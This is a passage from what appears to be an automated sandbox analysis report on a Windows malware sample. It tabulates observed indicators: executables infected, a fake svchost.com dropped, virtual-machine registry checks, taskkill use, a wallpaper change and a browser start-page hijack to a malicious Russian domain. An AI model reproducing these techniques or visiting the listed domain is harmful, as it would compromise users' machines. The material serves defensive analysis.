| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\vydcyu.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Pattern | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Search Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Internet Explorer\Desktop\General | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Dragon\\Desktop\\trollface1.jpg" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://prison-fakes.ru/s/3.php?t=" | C:\Users\Admin\AppData\Local\Temp\3582-490\vydcyu.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
